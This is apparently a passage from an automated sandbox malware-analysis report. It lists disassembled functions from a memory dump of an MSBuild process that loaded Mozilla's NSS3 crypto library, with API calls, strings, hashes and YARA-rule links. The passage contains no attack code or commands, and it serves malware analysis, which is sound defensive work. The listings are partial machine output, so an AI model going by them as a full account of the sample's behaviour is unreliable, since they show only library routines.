EnterCriticalSection.KERNEL32(?), ref: 6CBA4ED6
PR_Unlock.NSS3(?), ref: 6CBA4F01
free.MOZGLUE(00000000), ref: 6CBA4F2A

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: e00ff5fc008ba38da1f7d931248b278e736d8adfd11b18ffd880b593722910df
Instruction ID: 02119f4f31a7cbd645ecfbc1ffac0fc7f3c8ba6a4c548e8ee9811a53448e6298
Opcode Fuzzy Hash: e00ff5fc008ba38da1f7d931248b278e736d8adfd11b18ffd880b593722910df
Instruction Fuzzy Hash: 7BB10375A042459FDF00DFA8D884AAA77B4FF09318F045124ED5997B01EB31EA66CFE2

Function 6CBF6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CBF6BF7), ref: 6CBF6EB6

Part of subcall function 6CB51240: TlsGetValue.KERNEL32(00000040,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51267
Part of subcall function 6CB51240: EnterCriticalSection.KERNEL32(?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB5127C
Part of subcall function 6CB51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51291
Part of subcall function 6CB51240: PR_Unlock.NSS3(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB512A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CC9FC0A,6CBF6BF7), ref: 6CBF6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CBF6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CBF6EFC
PR_NewLock.NSS3 ref: 6CBF6F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBF6F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CBF6BF7), ref: 6CBF6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CBF6BF7), ref: 6CBF6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CBF6BF7), ref: 6CBF6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CBF6BF7), ref: 6CBF6FFD

Strings

# SSL/TLS secrets log file, generated by NSS, xrefs: 6CBF6EF7
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CBF6FDB
SSLFORCELOCKS, xrefs: 6CBF6F2B
NSS_SSL_CBC_RANDOM_IV, xrefs: 6CBF6FF8
SSLKEYLOGFILE, xrefs: 6CBF6EB1
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CBF6F4F

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: fafd96ef3007f6afc4c9333122b9eeb15515f0c8db1ebf48725688d0178c2d65
Instruction ID: 026f2378431839e99b79ee9686dd11e5fad453534897117baed0fd5ddad49fe5
Opcode Fuzzy Hash: fafd96ef3007f6afc4c9333122b9eeb15515f0c8db1ebf48725688d0178c2d65
Instruction Fuzzy Hash: EAA1F9F2E659D096EB104A3CCC0178936B1AB8332AF5843E5E831D7FD5DBF5994B8242

Function 6CB6C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB6C4D5

Part of subcall function 6CBBBE30: SECOID_FindOID_Util.NSS3(6CB7311B,00000000,?,6CB7311B,?), ref: 6CBBBE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CB6C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CB6C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB6C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6CB6C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6CB6C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CB6C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CB6C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CB6C751
PL_FinishArenaPool.NSS3(?), ref: 6CB6C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6CB6C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6CB6C7A9

Strings

security, xrefs: 6CB6C63F

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: b548712e1d558ea2fc10e1d4326a804a76f267e634a9f3824b770baea440cbda
Instruction ID: 113aff8db05ae525850012184d6c2b95643bbc8725c6c4a3e2bc7d7a4cea684a
Opcode Fuzzy Hash: b548712e1d558ea2fc10e1d4326a804a76f267e634a9f3824b770baea440cbda
Instruction Fuzzy Hash: 888127B1D001889AEF00EA96DC81BFE7778EF1130CF244125ED15A7E51E761E949CBA7

Function 6CB98500 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptDigestUpdate), ref: 6CB98526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB98554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB98563

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB98579
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6CB9859A
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6CB985B3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CB985CC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6CB985E7
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6CB98659

Strings

pEncryptedPart = 0x%p, xrefs: 6CB98595
(CK_INVALID_HANDLE), xrefs: 6CB9855C
*pulPartLen = 0x%x, xrefs: 6CB98654
pulPartLen = 0x%p, xrefs: 6CB985E2
C_DecryptDigestUpdate, xrefs: 6CB98521
pPart = 0x%p, xrefs: 6CB985C7
hSession = 0x%x, xrefs: 6CB9853E, 6CB9854E
ulEncryptedPartLen = %d, xrefs: 6CB985AE

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptDigestUpdate
API String ID: 1003633598-1019776760
Opcode ID: 226bb6bb922db79937ead7953d363a65edcacc7931d657005285abccc0b3e90a
Instruction ID: fe051ce1949442fac77ebf43f9e2f557e251a71bcbd276f34f3a60b1de39301b
Opcode Fuzzy Hash: 226bb6bb922db79937ead7953d363a65edcacc7931d657005285abccc0b3e90a
Instruction Fuzzy Hash: 5241B675601184AFDB10DF54DD59E8E3BB1EB4331DF494075E408AB612EB32DE58CBA2

Function 6CB96D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CB96D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB96DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB96DC3

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB96DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB96DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB96E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CB96E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CB96E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CB96EB9

Strings

(CK_INVALID_HANDLE), xrefs: 6CB96DBC
ulDataLen = %d, xrefs: 6CB96E0E
pulDigestLen = 0x%p, xrefs: 6CB96E42
pData = 0x%p, xrefs: 6CB96DF5
C_Digest, xrefs: 6CB96D81
hSession = 0x%x, xrefs: 6CB96D9E, 6CB96DAE
pDigest = 0x%p, xrefs: 6CB96E27
*pulDigestLen = 0x%x, xrefs: 6CB96EB4

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: e00668365c2147005ddfd03af5492cdd332732e6beeb4ffc8333e1163a355904
Instruction ID: e44e2231de78f5e37b85c2da7ee213b040bd42ab18b9289eafecbedf284d4a4e
Opcode Fuzzy Hash: e00668365c2147005ddfd03af5492cdd332732e6beeb4ffc8333e1163a355904
Instruction Fuzzy Hash: 5441CE75601194AFDB509F54DC59E8A3BB1EB8371DF494024E808E7A22EB31DA48CBE2

Function 6CBD4500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(6CBD3803,?,6CBD3817,00000000), ref: 6CBD450E

Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825

PR_SetError.NSS3(FFFFE005,00000000,?,6CBD3817,00000000), ref: 6CBD4550
SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6CBD45B5
SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6CBD4709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6CBD4727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6CBD473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6CBD4801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CC92DA0,?,?,?,?,?,?,?,?,00000000), ref: 6CBD482E
PR_GetCurrentThread.NSS3 ref: 6CBD48F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6CBD4923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6CBD4937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6CBD494E
PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6CBD4963
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CBD4984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6CBD21C2,?,?,?), ref: 6CBD499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBD49B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6CBD49C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6CBD49DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBD49E9

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
String ID:
API String ID: 3698863438-0
Opcode ID: 5e631adecad06e4bb372dc6496d379bf09ecd39d485d5cb952a73da4ab9f99cf
Instruction ID: 06a1d21797ec8da46ef9c1ba8e9845aff8886ea9c8852ef0b9243a30f0c323e2
Opcode Fuzzy Hash: 5e631adecad06e4bb372dc6496d379bf09ecd39d485d5cb952a73da4ab9f99cf
Instruction Fuzzy Hash: 6FA1F4B5E012849BEF008B65DC80BAE7775EB0531CF264125E915ABB81E736FC448FA6

Function 6CBB8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CBB8E01,00000000,6CBB9060,6CCC0B64), ref: 6CBB8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CBB8E01,00000000,6CBB9060,6CCC0B64), ref: 6CBB8E9E
PORT_ArenaAlloc_Util.NSS3(6CCC0B64,00000001,?,?,?,?,6CBB8E01,00000000,6CBB9060,6CCC0B64), ref: 6CBB8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CBB8E01,00000000,6CBB9060,6CCC0B64), ref: 6CBB8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CBB8E01,00000000,6CBB9060,6CCC0B64), ref: 6CBB8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CBB8E01,00000000,6CBB9060,6CCC0B64), ref: 6CBB8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CBB8E01), ref: 6CBB8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CCC0B64,6CCC0B64), ref: 6CBB8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CBB8F3F

Part of subcall function 6CBBA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CBBA421,00000000,00000000,6CBB9826), ref: 6CBBA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBB904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CBB8E76

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 9de1cd5863923329403048b18792012bb2381f2ad909354ec5caa694f08fb5a9
Instruction ID: f79fc4339f5daa17832856934f30005b86d25ba461c167edeea381f4789d4446
Opcode Fuzzy Hash: 9de1cd5863923329403048b18792012bb2381f2ad909354ec5caa694f08fb5a9
Instruction Fuzzy Hash: 5C616CB5E002569BDB10CF55CC80ABFB7BAEF94358F144529EC18B7700EB36A915CAB1

Function 6CB68E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB68E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CB68E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB68EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CC918D0,?), ref: 6CB68F03
PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CB68F19
PL_FreeArenaPool.NSS3(?), ref: 6CB68F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB68F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB68F65
PL_FinishArenaPool.NSS3(?), ref: 6CB68FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CB68FFE
PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CB69012
PL_FreeArenaPool.NSS3(?), ref: 6CB69024
PL_FinishArenaPool.NSS3(?), ref: 6CB6902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CB6903E

Strings

security, xrefs: 6CB68EE7

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: b6ec993b4d91db85d7335b44c0e3f5140d6ed51f2f48ba851ed5ec9e6cdcc050
Instruction ID: ac5d2188c98432fe97b2b95cb63b45e20bdf5ab5e2eb4775cac9392c807b7053
Opcode Fuzzy Hash: b6ec993b4d91db85d7335b44c0e3f5140d6ed51f2f48ba851ed5ec9e6cdcc050
Instruction Fuzzy Hash: 1D5138B5A08280ABD7109B5ADC41FAB77A8EBC675CF44082EF55597F40E732D908C753

Function 6CB94E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CB94E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB94EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB94EC7

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB94EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CB94F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB94F1A
PR_LogPrint.NSS3(?,00000000), ref: 6CB94F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CB94F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CB94F68

Strings

(CK_INVALID_HANDLE), xrefs: 6CB94EC0, 6CB94F13
ulCount = %d, xrefs: 6CB94F63
pTemplate = 0x%p, xrefs: 6CB94F4A
C_GetAttributeValue, xrefs: 6CB94E7E
hObject = 0x%x, xrefs: 6CB94EF5, 6CB94F05
hSession = 0x%x, xrefs: 6CB94EA2, 6CB94EB2

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: 4c0499866172c27e8477187797a808a418d1c1876370e0e8aa90c4372fb40125
Instruction ID: 2cd9dc7ad5316591608e1ab5af6334b74e67fc0463d1dc6109a6d344a31ccd87
Opcode Fuzzy Hash: 4c0499866172c27e8477187797a808a418d1c1876370e0e8aa90c4372fb40125
Instruction Fuzzy Hash: C041CD71602185ABDF049F54DD98F9F3BB5EB4331DF098034E819A7A11EB309E48CBA2

Function 6CB94CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CB94CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB94D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB94D37

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB94D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CB94D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB94D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CB94DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CB94DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CB94E20

Strings

(CK_INVALID_HANDLE), xrefs: 6CB94D30, 6CB94D83
C_GetObjectSize, xrefs: 6CB94CEE
*pulSize = 0x%x, xrefs: 6CB94E1B
hObject = 0x%x, xrefs: 6CB94D65, 6CB94D75
hSession = 0x%x, xrefs: 6CB94D12, 6CB94D22
pulSize = 0x%p, xrefs: 6CB94DB7

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 0b763859edc9a75b48bbe2a4e8b827df34756f87ee088ed5d63460c9f53e2264
Instruction ID: 45d9e4ba7995fa5da5b8e3e1b05da6fe94c531a425cec798079bd8ab3591409c
Opcode Fuzzy Hash: 0b763859edc9a75b48bbe2a4e8b827df34756f87ee088ed5d63460c9f53e2264
Instruction Fuzzy Hash: 1E41E575601154AFDB149F10DD99FAA3B75EF4330EF094035E418ABA21EB319E48CFA2

Function 6CC2CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC2CC7B), ref: 6CC2CD7A

